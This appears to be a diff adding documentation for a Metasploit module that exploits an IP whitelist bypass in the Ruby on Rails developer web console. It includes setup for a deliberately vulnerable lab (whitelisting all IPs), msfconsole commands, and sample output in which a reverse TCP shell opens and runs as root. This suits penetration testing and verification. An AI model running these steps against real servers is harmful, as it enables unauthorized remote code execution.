land-8206 docs for rais_web_console_v2_code_exec

Author: h00die

documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md

@@ -0,0 +1,54 @@
+## Description
+
+ This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range.
+
+## Verification Steps
+
+**Prerequisites:**
+
+```
+gem install rails -v 4.2.6
+rails new taco
+cd taco
+vim config/environments/development.rb
+```
+
+Add the following line just before the final `end` tag:
+
+```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```
+
+```
+bundle
+rails server
+```
+
+**Installing nodejs:**
+
+```
+sudo apt-get install nodejs
+```
+
+**Launch msfconsole:**
+
+1. Do: ```use exploit/multi/http/rails_web_console_v2_code_exec```
+2. Do: ```set RHOST [IP]```
+3. Do: ```set RPORT [Port]```
+4. Do: ```run```
+
+## Sample Output
+
+### Rails version 4.2.6
+
+```
+msf > use exploit/multi/http/rails_web_console_v2_code_exec 
+msf exploit(rails_web_console_v2_code_exec) > set RHOST 192.168.0.106
+msf exploit(rails_web_console_v2_code_exec) > set RPORT 35678
+msf exploit(rails_web_console_v2_code_exec) > run
+
+[*] Started reverse TCP handler on 192.168.0.102:4444
+[*] Sending payload to /__web_console/repl_sessions/d89c2f96387f4b9dd612c0abb7c06577
+[*] Command shell session 1 opened (192.168.0.102:4444 -> 192.168.0.106:35678) at 2017-04-07 04:13:52 +0800
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```